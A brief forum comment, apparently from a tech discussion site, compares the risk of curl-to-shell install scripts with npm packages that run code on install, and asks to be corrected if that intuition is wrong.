|
|
|
|
|
|
by treve
355 days ago
|
|
|
It wasn't meant as a gotcha. I'm actually curious if this went wrong, and if it was more of a spear-fishing style attack or a vulnerability hitting multiple people. Tons of devs download thousands of NPM packages as well, and each can execute code upon install, so a single curl-to-shell pipe from a HTTPS endpoint from a domain you checked always felt way safer than any `npm install`, and so a pretty minor in comparison and yet it gets a lot more attention than package manager, which _feels_ like security cargo culting. Plenty of supply chain attacks in package managers of course. But yeah, would like to be corrected if that intuition is wrong. |
|
|